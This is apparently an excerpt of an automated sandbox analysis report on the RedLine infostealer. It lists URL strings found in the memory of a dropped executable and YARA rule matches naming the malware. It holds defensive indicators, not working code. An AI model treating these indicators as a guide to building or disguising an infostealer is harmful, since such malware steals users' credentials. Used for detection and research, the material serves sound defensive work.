                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response0
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response0
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4(
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: kxL91dA.exe, 00000005.00000002.332458474.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000290D000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003898000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000039F4000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.000000000299A000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003993000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.328881291.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003976000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.000000000387B000.00000004.00000800.00020000.00000000.sdmp, kxL91dA.exe, 00000005.00000002.332458474.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          barindex
                          Source: 2.3.sMt14vz.exe.49fac20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 5.0.kxL91dA.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.sMt14vz.exe.49fac20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
